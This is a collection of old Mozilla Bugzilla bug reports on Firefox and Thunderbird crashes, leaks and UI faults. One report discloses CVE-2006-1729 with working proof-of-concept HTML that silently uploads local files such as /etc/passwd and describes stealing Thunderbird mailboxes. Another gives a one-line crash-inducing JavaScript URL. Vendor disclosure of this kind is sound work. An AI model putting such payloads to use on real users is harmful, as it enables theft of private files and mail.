User-Agent: Mozilla/5.0 (X11; U; Linux i686; cs; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; cs; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
When I use "print" or "print preview" of menu, Firefox printing content of NOSCRIPT tag on paper (or on screen if I use "print previw"). This problem no exist in version 1.5.
Reproducible: Always
Steps to Reproduce:
1. open page which contains NOSCRIPT tag
2. use "print" or "print preview"
3. displaying or printing content od NOSCRIPT tag on paper or screen
|
|
334,977 | 2,835,357 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060202 Fedora/1.0.7-1.2.fc4 Firefox/1.0.7
Build Identifier: http://www.mozilla.com/products/download.html?product=firefox-1.5.0.2&os=win&lang=en-US
I was trying to reproduce CVE-2006-1729 with very little details.
Came up with this code :
function change() {
document.getElementById('chuckfile').type='radio';
document.getElementById('chuckfile').type='file';
}
chuckfile was originally type textbox
it worked on the vulnerable versions of firefox listed. Hey! I said to myself, alright!
posted it to a friend, he said he was patched. Asked him anyways to have a look.
Now for the interesting part.
It still worked. Not believing him, I ran over to a winxp machine 10 minutes ago, d/l'd 1.5.0.2 , and ran and it worked.
so attached will be lots of PoC and some other stuff for perusal. The PoC assumes the user has a install of thunderbird on their linux machine, and tries to upload the mailbox store.
also in the tarball is a quick demo for windows people uploading boot.ini
Reproducible: Always
Steps to Reproduce:
Steps to reproduce:
if using linux with a LAMP setup do this:
throw all the HTML into /var/www/html (or somewhere similar).
visit sploit_1729.html
will attempt to upload /etc/passwd
parse that, find user dirs
then try to locate $USERDIR/.thunderbird/profiles.ini
upload that
parse that for profile dir
then try upload
$USERDIR/.thunderbird/$PROFILE/Mail/Local\ Folders/Inbox
There are also cve-2006-1729.html & cve-2006-1729_windows.html which are quick dirty demo's of the prob
Actual Results:
uploads my files
Expected Results:
don't upload my files!
Here's a quick demo if you don't want a tarball
<HTML>
<HEAD>
<script>
function change() {
document.getElementById('chuckfile').type='radio';
document.getElementById('chuckfile').type='file';
}
</script>
</HEAD>
<BODY onLoad="change();document.getElementById('aform').submit();">
<FORM id="aform" enctype="multipart/form-data" ACTION="uploadhere.php" METHOD="POST">
<INPUT id="chuckfile" type="text" name="file4chuck" value="/etc/passwd" />
</FORM>
</HTML>
|
|
334,983 | 2,835,417 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060417 Firefox/3.0a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060417 Firefox/3.0a1
see #334616 comment 19 and comment 20.
Reproducible: Always
Steps to Reproduce:
1. start firefox (debug build)
Actual Results:
Assertion nsUUIDGenerator not thread-safe: '_mOwningThread.GetThread()
Expected Results:
no assertion
|
|
335,077 | 2,836,198 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060421 BonEcho/2.0a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060421 BonEcho/2.0a1
Middle clicking on the "back" button on the Firefox toolbar does not do anything.
Reproducible: Always
Steps to Reproduce:
1. Go to a site and then middle click on the back button.
Actual Results:
Nothing.
Expected Results:
Last page in history should open in a new tab.
|
|
335,481 | 2,839,246 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Thunderbird 1.5.0.2 (Windows/20060308)
Importing a .pfx file obtained from the Communigate Pro Web User interface crashes ThunderBird.
Reproducible: Always
Steps to Reproduce:
1. Download the sample PFX file from http://vas.tomsk.ru/test.pfx or use the attached one.
2. Try to import it into "Personal certificates", the password is "test"
3. See ThunderBird crash
Actual Results:
Thunderbird crashes and is closed by the OS.
Expected Results:
The certificate and key should have been added to the storage.
Files created with "openssl pkcs12" are imported just fine.
|
|
335,545 | 2,839,523 |
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.8.0.2) Gecko/20060415 Firefox/1.5.0.2
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.8.0.2) Gecko/20060415 Firefox/1.5.0.2
when copying text bigger than 500kB fx creates new file in /tmp - clipboardcache[-X] which is 2x bigger than selection and never deleted
Reproducible: Always
Steps to Reproduce:
1.open file bigger than 500kB
2.select all, copy to clipboard (creates file clipboardcache-X in /tmp)
3.close fx
Actual Results:
file clipboardcache is still present in /tmp
Expected Results:
delete that file at exit or when it's not needed
(but i would prefer no to create that file at all...)
this bug was first reported in bug 289897 and confirmed od windows
|
|
335,878 | 2,842,000 |
A Japanese original report is http://bugzilla.mozilla.gr.jp/show_bug.cgi?id=5136
Reproducible: Always
Steps to Reproduce:
1. Open URL.
2. Install search engin of "産経新聞 記事検索".
(The link is "javascript:addEngine. ('sankei','png','Search')")
3. See Search Engin pulldown menu and Search Engin Manager.
Windows NT, Mac OS X 10.3.9
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20060428 Minefield/3.0a1
|
|
331,523 | 2,809,704 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1
Places crashes after creating a new seperator inside a folder on the right pane. The thing is this has to be preceded by the creation and then deletion of a New folder, otherwise it doesn't happen.
Reproducible: Always
Steps to Reproduce:
1.Create a new folder in Places
2.Make it visible in the left pane by clicking multiple times on the root folder
3.Now delete the new folder in the right pane.
4.Go to an already existing folder with many Bookmarks.
5.Put a new separator in this already existing folder.
6.Will crash, every time.
Actual Results:
Firefox crashes, but when you reload Firefox the separator should be there.
Expected Results:
No crash, and a nice little separator in between some bookmarks.
|
|
331,620 | 2,810,454 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Build Identifier: All FireFox versions from version 1.5
The bug has been there since FireFox version 1.5.
Check the provided forum link:
http://forums.mozillazine.org/viewtopic.php?p=2166546#2166546
In addition check this URL for a test:
http://www.edialog24.com/tmp/test/
Click TWO times on Button 1, then ONCE on Button 2. IE6 (and all other major browsers) then displays: content1, content2, content3, content4.
FireFox 1.5/2.0a1 displays only: content3, content4.
Reproducible: Always
Steps to Reproduce:
Check Details
Actual Results:
Check Details
Expected Results:
Check Details
|
|
331,880 | 2,812,526 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Inside nsStackLayout::Layout(nsIBox* aBox, nsBoxLayoutState &aState) method in layout/xul/base/src/nsStackLayout.cpp, the box is redrawn if and only if childRect's top coordinate(y) is not equal to its original top position or the similar discrepancy appears in it's left coordinate(x).
If a box is resized in the S, SE, or E direction, the affected region is not invalidated; hence, you will see a trail of the resizing activity.
My Fix:
change the line
if(childRect.x != oldRect.x || childRect.y != oldRect.y)
to
if(childRect!=oldRect)
I would love to disclose my xul/js source that would reproduce this problem everytime. However, this is an enterprise sw.
Reproducible: Always
Steps to Reproduce:
1. Write a xul document with a stack. Inside the stack, have a box.
2. Inside a js associated with a stack, capture mousedown, mousemove, mouseup event for moving and resize of a box.
3. drag to resize the south or east edge of the box and you shall see.
Actual Results:
You will see the trace of your resizing activity if you reduce the size of the box.
Expected Results:
If you resize the box in the north direction, you will see that gecko invalidate the affected region correctly. We should expect the same for all the other edges as well.
I just download the most recent source tarball off from ftp://ftp.mozilla.org/pub/mozilla.org/mozilla/nightly/latest-trunk/. I am still seeing the same line of code, though I haven't recompile the source and test against that source.
Free feel to contact me at [email protected]. Thank you.
|
|
331,943 | 2,813,012 |
This was caused by the fix for Bug 311403 (the patch for 1.0.x is in Bug 311025 comment #24).
js_CheckPrincipalsAccess doesn't allow null scopePrincipals, but, in 1.0.x, a
sandbox object doesn't have principals.
Steps to Reproduce:
1. Setup a PAC file testcase on web server, or save it to local hard disk.
2. Set Automatic proxy configuration URL to its URL.
3. Open any web site.
4. See JS console.
Actual Results:
testcase 1:
Error: function eval must be called directly, and not by way of a function of another name.
testcase 2:
Error: function Function must be called directly, and not by way of a function of another name.
Expected Results:
testcase 1:
PAC-alert: OK: eval()
testcase 2:
PAC-alert: OK: new Function()
|
|
332,442 | 2,816,584 |
Steps to reproduce:
0) Open certificate manager
1) Select the Authorities tab
2) Select a certificate
3) Click Edit button
Result:
WARNING: Illegal character in window name AAAAAAAAAAAAAAARAAAAjADQHkCQAABGUgAAAAEAAAAEMIGJMQswCQYDVQQGEwJV
UzELMAkGA1UECBMCREMxEzARBgNVBAcTCldhc2hpbmd0b24xFzAVBgNVBAoTDkFC
QS5FQ09NLCBJTkMuMRkwFwYDVQQDExBBQkEuRUNPTSBSb290IENBMSQwIgYJKoZI
hvcNAQkBFhVhZG1pbkBkaWdzaWd0cnVzdC5jb20=: file /opt/source/mozilla/trunk/mozilla/embedding/components/windowwatcher/src/nsWindowWatcher.cpp, line 1316
The code is here:
http://lxr.mozilla.org/seamonkey/source/security/manager/pki/resources/content/certManager.js#305
it opens the dialogue using the cert's dbKey as window name, which leads to the illegal name.
The same bug seems to be in this file:
http://lxr.mozilla.org/seamonkey/source/security/manager/pki/resources/content/editcerts.js#232
|
|
332,448 | 2,816,670 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1
When you try to submit a search that uses POST data, it tries to set the data directly to the "data" variable of the input stream instead of using the setData method, resulting in an error
Reproducible: Always
Steps to Reproduce:
1. Try to use the search toolbar with an engine that uses the POST method instead of the more commom GET method (an example would be php.net)
Actual Results:
Nothing happens, the Javascript Console shows an error
Expected Results:
Search page opens
|
|
332,840 | 2,819,651 |
When I reload all live bookmarks I see:
Security Error: Content at moz-nullprincipal:{28d3a532-b53f-49be-a030-f1894af42d9d} may not load or link to http://gemal.dk/blog/feeds/index.xml.
not sure what it means. I just reloaded my love bookmark
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060404 Firefox/1.6a1
|
|
333,591 | 2,825,271 |
Steps to reproduce:
- Set Clear Private Data to set Saved Form Information on close
- Restart Firefox
- The form information is still there
NB: In the Privacy > Saved Form tab in the Options window this button is grayed out.
I'm nearly positive that I reported this before, but I can't find the bug so I think it is closed but the problem is still there.
|
|
339,343 | 2,865,916 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060526 BonEcho/2.0a2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060526 BonEcho/2.0a2
If I install an opensearch search plugin with a Base64 PNG image as the icon, then the icon doesn't show up in the drop down search list.
Reproducible: Always
Steps to Reproduce:
1. Goto http://www.edazzle.net/os/pluginlist.aspx?q=bbc
2. Click on 'Add BBC News and Sport'
Actual Results:
No icon displayed
Expected Results:
Icon should be displayed
|
|
339,478 | 2,866,849 |
Steps to reproduce:
1. Type the following in a <textarea>: "this is testi somethi".
2. Right click on "testi" and correct it.
3. Place the cursor after the "i" in something and resume typing.
4. Finish typing "something".
Results:
"something" (the entire word) is marked as incorrect. When you right click it it offers suggestions for what it thinks "somethi" should be.
Expected results:
Don't mark "something" as incorrect.
|
|
339,710 | 2,868,785 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060530 BonEcho/2.0a3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060530 BonEcho/2.0a3
When I enter the keyword or something that has space in location bar then click/middle click the "Go" button, browser cannot go to the page and just show an alert that is "The URL is not valid and cannot be loaded"
Reproducible: Always
Steps to Reproduce:
1.Enter the keyword or something that has space in location bar
2.Click/Middle click the "Go" button
3.
Actual Results:
Browser cannot go to the page and just show an alert that is "The URL is not valid and cannot be loaded"
Expected Results:
Go to the page that using the keyword or search the word of the website that you have type
|
|
340,345 | 2,873,331 |
BUILD: Current trunk build (but the issue predates the threadmanager landing)
STEPS TO REPRODUCE:
1) Download attached testcase to a file:// URI (so the enablePrivilege call will
work)
2) Load it from file://.
3) Click the button.
4) Grant UniversalBrowserRead
EXPECTED RESULTS: The output says:
starting
finished
timeout
Or at least this is what's expected given run-to-completion.
ACTUAL RESULTS: The output says:
starting
timeout
finished
|
|
294,191 | 2,502,127 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
If you defined a function named "f" which has inner function named "x",
"f.x" refers some function which seems to be "x". Such property can be
deleted by an expression "delete f.x;". The function "f" works without
any problem even if you deleted "f.x". But doing this when all of the
following conditions are met causes an access violation in JS3250.DLL:
(a) One or more inner functions of "f" must refer the inner function
which has same name as the deleted property "x".
(b) prior to deleting "f.x", "f" must have one or more user defined
properties other than "x". => "f.z=0;", "f.a=f.b=0;" ...
Reproducible: Always
Steps to Reproduce:
1. navigate the browser to
javascript:function f(){function x(){x;}}f.z=0;delete f.x;f();
Actual Results:
the browser crashes.
Expected Results:
nothing should happen.
|
|
295,561 | 2,511,768 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
According to the DOM Level 2 spec I should be able to access the rows[] and
cells[] collections using either the ordinal or the id/name. However, I only
seem to be able to use an ordinal to access rows and cells.
This works: table_element.rows[0].cells[0]
This works in IE not FF: table_element.rows["row1"].cells["cell1"]
This works in IE not FF:
table_element.rows.namedItem("row1").cells.namedItem("cell1")
Reproducible: Always
Steps to Reproduce:
Browse to the supplied URL
Actual Results:
No alert messages are displayed. JavaScript Console reports the following error:
Error: document.getElementById("table1").rows.namedItem("table1row2") has no
properties
Source File: http://castlehillsda.org/test_table.html
Line: 6
Expected Results:
Two alert messages should fire when the page loads, displaying the contents of
the central cell in the table. This works correctly in IE6.
|
|
285,204 | 2,437,530 |
See upcoming testcase.
When following the steps in the testcase, I get a freeze/hang of Mozilla and I
need to shut down Mozilla with the Task Manager.
|
|
285,219 | 2,437,644 |
analysis from brendan:
eval(__s, __o) ... same as __o.eval(__s), more or less
that's the bug
http://lxr.mozilla.org/mozilla/source/extensions/venkman/resources/content/venkman-eval.js#50
|
|
285,445 | 2,439,329 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
This is a bug related to #266858 which is statuted as unconfirmed since a long
time because the bug hasn't be reproduced. This description is more precise and
should make the bug obvious.
Description: The vertical scroll bar of the frame at the bottom of the window
lost its "go down" button when FireFox passes from mode No-Tab to mode Multi-Tab.
Reproducible: Always
Steps to Reproduce:
1. Make sure your screen is sized 1024*768 or smaller.
2. Make sure you've checked the FireFox option "Hide the tab bar when only one
web site displayed" (Menu "Tool"/"Options", then got to "Advanced" and "Tabbed
browsing").
3. Open a new browser, and enter the URL:
http://www.skrol29.com/index.php?lang=en&page=dev
4. Open a new blank tab (Menu: File/New tab, or Ctrl+T)
5. Select the first tab to see the previously displayed web site.
Actual Results:
The vertical scroll bar has lost its "go down" button.
Expected Results:
Resize the vertical scroll bar.
|
|
285,828 | 2,442,074 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050303 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050303 Firefox/1.0+
Per bug 172817 comment 70...
Reproducible: Always
Steps to Reproduce:
1. Call loadPage with DISPLAY_AS_SOURCE
2. Output the text nodes of the resulting document's pre elements.
3. Same as #1
4. Same as #2
Actual Results:
The first time, the element names, attribute names, and attribute values all
come out as null. The second time, they come out as their real values.
|
|
295,983 | 2,514,765 |
BUILD: Current trunk build
STEPS TO REPRODUCE:
1) env XPCOM_MEM_LEAK_LOG=/tmp/log.txt firefox
2) Open two tabs
3) Start
http://lxr.mozilla.org/seamonkey/source/layout/base/nsCSSFrameConstructor.cpp
loading in the first tab.
4) Close that first tab before the load completes (using Ctrl-W)
5) Quit firefox
6) Look at leak log
EXPECTED RESULTS: very few leaks
ACTUAL RESULTS: leaked nsDocument objects, etc.
What's going on is that when we stop the load we have script on the stack (the
event handler script for the <xul:key> that's closing the tab). So we don't
null out the mParser in nsHTMLDocument::EndLoad; instead we set the termination
func on the context and return. Before the script is done, though, it
dispatches a DOM event (a "select" event, to be precise). This calls into
nsJSContext::CallEventHandler which nulls out the termination function. So we
never break the document -> parser -> sink -> document cycle and leak the whole
thing.
I think we could fix that up by restoring the original func and arg instead of
just nulling them out unconditionally. That would still leave a problem --
script could both mess with the document and call close() on the window. In
that case the two would race to both set the termination func on the context and
either we leak like this or the window doesn't close properly...
|
|
296,054 | 2,515,187 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
I have configured Bugzilla 2.19.3 with PostgreSQL backend, and when I try to add
a new query for an event/whining (editwhines.cgi) a simple SQL-failure hits me.
Reproducible: Always
Steps to Reproduce:
1. Setup Bugzilla 2.19.3 with PostgreSQL-backend
2. Login as admin
3. "Edit: Whining"
(4. Add new event)
5. Add a new query
Actual Results:
Software error:
DBD::Pg::st execute failed: ERROR: null value in column "title" violates
not-null constraint
[for Statement "INSERT INTO whine_queries (eventid) VALUES (?)" with
ParamValues: 1='1'] at editwhines.cgi line 173
Expected Results:
Printed some options for the query.
|
|
296,687 | 2,519,800 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b2) Gecko/20050603 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b2) Gecko/20050603 Firefox/1.0+
original report written in Japanese:
http://bugzilla.mozilla.gr.jp/show_bug.cgi?id=4450
Like Bug 235850 and Bug 9526, TSM (IME) candidate window is displayed at wrong
position (too below).
In editing TextField or TextArea, ::LocalToGlobal() revises Point too bellow.
mozilla/widget/src/mac/nsMacEventHandler.cpp, line 1904 - 1917
> nsresult nsMacEventHandler::HandleOffsetToPosition(long offset,Point* thePoint)
> {
> thePoint->v = mIMEPos.y;
> thePoint->h = mIMEPos.x;
> printf("local (x,y) = (%d, %d)\n", thePoint->h, thePoint->v);
> WindowRef wind =
reinterpret_cast<WindowRef>(mTopLevelWidget->GetNativeData(NS_NATIVE_DISPLAY));
> nsGraphicsUtils::SafeSetPortWindowPort(wind);
> Rect savePortRect;
> ::GetWindowPortBounds(wind, &savePortRect);
> ::LocalToGlobal(thePoint);
> printf("global (x,y) = (%d, %d)\n", thePoint->h, thePoint->v);
>
> return PR_TRUE;
> }
A case, main window touch menu bar, but ::LocalToGlobal() revise Point.v more
than 100px.
> local (x,y) = (131, 96)
> global (x,y) = (130, 204)
Reproducible: Always
Steps to Reproduce:
1.Edit japanese in TextField or TextArea
2.
3.
Actual Results:
TSM(IME) candidate window touchs edited line.
Expected Results:
TSM(IME) candidate window is displayed at too below position.
|
|
296,818 | 2,520,573 |
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.8) Gecko/20050512
Build Identifier: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.8) Gecko/20050512
I'm using X-Terminal with limited ressources and I can check the allocated
memory with some hotkeys. So I can see that the allocated memory step by step
will shrink with every image I see in the foreground but also with the amount of
cached image.
When I clear the cache, the memory allocated at the X11 server on my X-Terminal
will be freed, but with loading next image the same bad beheavior begins.
--------
Old Versions like netscape 4.78 or netscape7 (gecko 2002xxxx) or opera are not
affected with this bug.
--------
Reproducible: Always
Steps to Reproduce:
1. visit this or any other webpage with many images
2. view this images at any order
3. you can see only one image at a time
4. but at 20th or 30th image mozilla can't create any new image - e.g. crash
Actual Results:
X Error of failed request: BadAlloc (insufficient resources for operation)
Major opcode of failed request: 53 (X_CreatePixmap)
Serial number of failed request: 118408
Current serial number in output stream: 118587
X Error of failed request: BadDrawable (invalid Pixmap or Window parameter)
Major opcode of failed request: 66 (X_PolySegment)
Resource id in failed request: 0x8001194
Serial number of failed request: 118478
Current serial number in output stream: 118591
Expected Results:
The cached images maybe hold in memory for performance, but have to release X11
pixmap or have to call XDestroyImage before going to memory.
|
|
297,080 | 2,522,397 |
To reproduce this bug:
- Open testcase
- Open Javascript Console, DOM Inspector or any other Firefox window
- Position that window on top, somewhere in the area of the testcase (the green
block)
- Move the mouse from the testcase area into the window 'favicon'.
Result:
The cursor stays at a pointer form.
When the tooltip appears (while you're still at the window 'favicon'), the
pointer form of the cursor disappears.
The cursor should directly become the regular form, and no tooltip should appear
in this case.
I'll attach a screenshot.
This could very well be related to bug 291507.
It doesn't happen with a 2005-02-23 build, it happens with a 2005-02-24 build.
So my guess is, this is a regression from the patch that got checked in at that
time (fix #2) in bug 125386.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.